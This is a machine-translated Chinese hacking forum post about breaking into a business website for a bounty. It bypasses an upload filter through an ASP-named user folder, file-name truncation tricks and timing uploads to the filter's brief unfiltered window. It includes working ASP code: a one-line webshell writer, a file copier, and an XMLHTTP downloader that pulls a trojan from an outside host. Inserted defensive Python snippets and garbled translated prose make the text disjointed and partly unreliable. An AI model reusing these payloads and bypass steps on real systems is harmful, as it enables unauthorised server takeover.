Laruence. Take notes. Last night, someone on the forum offered a 30 JB reward for getting past the VirtualWall illegal information interception expert.
As a diaosi, how could I ignore JB? So I sent a PM and gave it a try.
I opened the target site and saw that it runs a business website building system, V2.5, the "easy to think" business network in huicong network style.
After a look around, I used NC to submit a registration with the user name woc.asp. The system automatically creates a folder named after the user name.
Then I went to the album management page and uploaded an ASP trojan file with a JPG suffix. I thought it would be over in a second.
Nima's
It was intercepted, which puzzled me. I thought perhaps the trojan was not encrypted enough, so I merged a one-sentence trojan into an image.
It was still intercepted, so I captured the packet and looked at the URL of the upload address.
http://www.bkjia.com/inc/upload.asp?TMode=8&istwo=1&utype=vipinfo&guser=woc.asp
The last parameter turned out to be the user name, which means the last parameter can be used to upload files to any directory.
I wanted to change it to woc.asp;.jpg and submit it with NC truncation to get a shell.
I also tried woc.asa0000.jpg, woc.cer;jpg and woc,cdx0000.jpg.
The asa one was intercepted. CER and CDX were not, but it turned out that they are not parsed and the source code is displayed directly. Why were cer and cdx not intercepted? And my SHELL source code had been uploaded as well,
Isn't it possible to make a bid of 30 JB in tears for 30 minutes?
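The upload URL above lets the client name the target folder through guser, and the registered user name becomes a folder name. A server-side check for both, as an added example in Python (not the site's code, which is ASP); the allowlists, the numeric session id and the upload root are assumptions of this sketch.

```python
import os
import re
import secrets

# Assumed policy for this sketch: image uploads only.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
# Script extensions named in the post, matched anywhere in a name.
SCRIPT_EXT = re.compile(r"\.(asp|asa|cer|cdx)(?=$|[;./\\\x00])", re.I)
SAFE_USER = re.compile(r"^[A-Za-z0-9_-]{3,32}$")


def username_problems(name):
    """Return the reasons a user name is unsafe to use as a folder name."""
    problems = []
    if SCRIPT_EXT.search(name):
        problems.append("script extension in name")
    if any(c in name for c in ";\x00/\\"):
        problems.append("separator, semicolon or NUL")
    if not SAFE_USER.match(name):
        problems.append("outside allowlist [A-Za-z0-9_-]{3,32}")
    return problems


def upload_target(upload_root, session_user_id, client_filename):
    """Build the storage path from server-side state only.

    session_user_id is assumed to be the numeric id of the logged-in
    account; a guser-style request parameter is never consulted.
    """
    if not isinstance(session_user_id, int) or session_user_id <= 0:
        raise ValueError("no authenticated user")
    if "\x00" in client_filename or ";" in client_filename:
        raise ValueError("rejected file name")
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    # Server-generated name: nothing from the client reaches the path.
    stored = secrets.token_hex(16) + ext
    root = os.path.realpath(upload_root)
    path = os.path.realpath(os.path.join(root, str(session_user_id), stored))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("path escapes upload root")
    return path
```

Serving the upload directory with script execution disabled covers the case where a name check like this is bypassed or missing.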
After several minutes in the back end, I could not find a good way to get the SHELL. Suddenly a chrysanthemum fell from the sky, and I seemed to find something.
In fact, nothing much was found, only that the illegal information interception expert filters directories such as a.asp and a.asa, and file names containing asp; and asa;.
It did not intercept the data we PUT. This is where this interception expert falls short of perfect,
Which of the following is a first-class information interception system? It filters many characters, which is very painful. Someone is bound to ask: since you cannot directly PUT
a file with the ASP suffix, how do you get the SHELL? I have to tell you one thing.
Perhaps the interception system was moved by my 30 minutes of tears. Without meaning to, I opened my SHELL and it was parsed.
However, it was parsed for only a few seconds.
Later, I quietly watched this expert.
It turned out to follow a certain pattern: for a few seconds on the hour or on the whole minute, nothing is intercepted.
Those few seconds should be the way to break through the interception expert. I then stared at the computer for more than an hour.
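From the operator's side, a window like the one described above shows up in the access log as a path that is normally blocked but occasionally served. An added example, not part of the original post, run over constructed log lines; the log layout and the use of 403 for "blocked" are assumptions.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample lines (not from the page): time, client, status, path.
# 403 stands in for "blocked by the filter"; the real status is an assumption.
SAMPLE_LOG = """\
2013-05-02 01:14:37 203.0.113.9 403 /up/woc.asp/1.jpg
2013-05-02 01:14:52 203.0.113.9 403 /up/woc.asp/1.jpg
2013-05-02 01:15:01 203.0.113.9 200 /up/woc.asp/1.jpg
2013-05-02 01:15:09 203.0.113.9 403 /up/woc.asp/1.jpg
2013-05-02 01:16:02 203.0.113.9 200 /up/woc.asp/1.jpg
2013-05-02 01:16:30 198.51.100.7 200 /index.asp
"""


def parse(log_text):
    """Yield (timestamp, client, status, path) for each log line."""
    for line in log_text.splitlines():
        date, clock, client, status, path = line.split()
        ts = datetime.strptime(date + " " + clock, "%Y-%m-%d %H:%M:%S")
        yield ts, client, int(status), path


def filter_gaps(log_text, blocked_status=403, min_blocked=2):
    """Find paths that are normally blocked but were served at least once."""
    seen = defaultdict(lambda: {"blocked": 0, "served": []})
    for ts, client, status, path in parse(log_text):
        entry = seen[(client, path)]
        if status == blocked_status:
            entry["blocked"] += 1
        elif 200 <= status < 300:
            entry["served"].append(ts)
    findings = []
    for (client, path), e in sorted(seen.items()):
        if e["blocked"] >= min_blocked and e["served"]:
            findings.append({
                "client": client,
                "path": path,
                "blocked": e["blocked"],
                "served_at": [t.strftime("%H:%M:%S") for t in e["served"]],
                # Offsets clustered near 0 match the whole-minute gap.
                "second_of_minute": sorted({t.second for t in e["served"]}),
            })
    return findings
```

A finding whose second_of_minute values sit close to zero points at a filter that stops inspecting on a schedule rather than at a rule that was changed.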
So I immediately came up with some new ideas.
1. Use FSO to generate a one-sentence shell directly in the parent directory (a SHELL cannot be generated in the a.asp directory, because it is intercepted relentlessly).
2. Use FSO to copy the uploaded trojan file with the JPG suffix directly to an ASP file in the parent directory.
3. Download with XMLHTTP, without FSO.
Here I will first list the code I used
1. Code to generate a one-sentence shell with FSO
<%
Dim Content, Fso, Fout
Set Fso = Server.CreateObject("Scripting.FileSystemObject")
' Target is one level up, outside the filtered directory
Set Fout = Fso.CreateTextFile(Server.Mappath("../123.asp"))
Fout.WriteLine "<script language=VBScript runat=server>if request(chr(35))<>"""" then"
Fout.WriteLine "response.clear"
Fout.WriteLine "ExecuteGlobal request(chr(35))"
Fout.WriteLine "end if"
Fout.WriteLine "</script>"
Fout.Write Content
Fout.Close
Set Fout = Nothing
Set Fso = Nothing
%>
2. Code to copy the file with FSO
<%
TempSource = Server.MapPath("/921196360.jpg") ' source file
TempEnd = Server.MapPath(folder & "../4040.asp") ' destination file
Call CopyFiles(TempSource, TempEnd)

Function CopyFiles(TempSource, TempEnd)
    Dim FSO
    Set FSO = Server.CreateObject("Scripting.FileSystemObject")
    ' Refuse to overwrite an existing destination
    If FSO.FileExists(TempEnd) Then
        Response.Write "the target backup file <B>" & TempEnd & "</B> already exists. Please delete it first!"
        Set FSO = Nothing
        Exit Function
    End If
    ' Stop if the source is missing
    If FSO.FileExists(TempSource) Then
    Else
        Response.Write "the source data file to be copied <B>" & TempSource & "</B> does not exist!"
        Set FSO = Nothing
        Exit Function
    End If
    FSO.CopyFile TempSource, TempEnd
    Response.Write "successfully copied the file <B>" & TempSource & "</B> to <B>" & TempEnd & "</B>"
    Set FSO = Nothing
End Function
%>
3. Code to download a file with XMLHTTP, without FSO
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET", "http://www.xxxxx.com/921994421.jpg", False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3 ' read/write
sGet.Type = 1 ' binary
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("../system.asp"), 2 ' 2 = overwrite if present
Set sGet = Nothing
Set xPost = Nothing
Response.Write("Download successful!")
%>
Because I can barely understand ASP, the code above was not written by me. It is the result of several hours of digging through Baidu and GG.
Continue
When I wrote the first code, I quickly uploaded it to my website,
Looking at the time, I refreshed my SHELL path almost all the time.
The Code was executed again,
As you can see, it took a long time to find out that the target website does not have FSO enabled.
FSO stands for File System Object. The first two pieces of ASP code above use the FSO component to write the SHELL and copy files.
I was crying,
So I turned to Baidu again and found the method for getting a SHELL without FSO,
Time passed, minute by minute and second by second. I looked at the brightening sky outside the window.
Who knows where my friend got an ASP file for XMLHTTP file download.
This is code 3 posted above. I continued with the same process as before,
I changed the suffix to JPG and threw it at the target site. Then I began to wait for the expert to take a break.
Try while watching and alignside.
You can see it. The file is successfully downloaded.
(This figure is from testing against a test website tonight, because I do not want to test on the target machine any more. Waiting for the expert to take a rest is a waste of time.)
Open the website and go to system.asp, which is blank. The one-sentence trojan has been downloaded.
Start the connection end with one sentence, and the next step is the dog blood. Ma'ama
I am very excited. I am grateful to anyone who sent Me 100JB, but it seems that I didn't send it.
----------------------------
Sometimes you spend a night or even a few days on a single target, only to get the SHELL in one brief second.
I expect this happens often. Well, this is my non-mainstream bypass method,
The method is to use the few seconds in which the interception expert is not intercepting to download our WEBSHELL.
It is just that those seconds are too hard to catch. The price for one night was 30 JB.
Which second does the Forum charge for MD5. Nima is faster than others.
Envy Me, And the profitable business is all gone
Of course, I do not know whether every interception expert of this version has these few seconds without detection.
If so, you will surely be able to do this in the future, and the experts will have a better way to announce it.
Learning
Reprinted from: NO. THINKING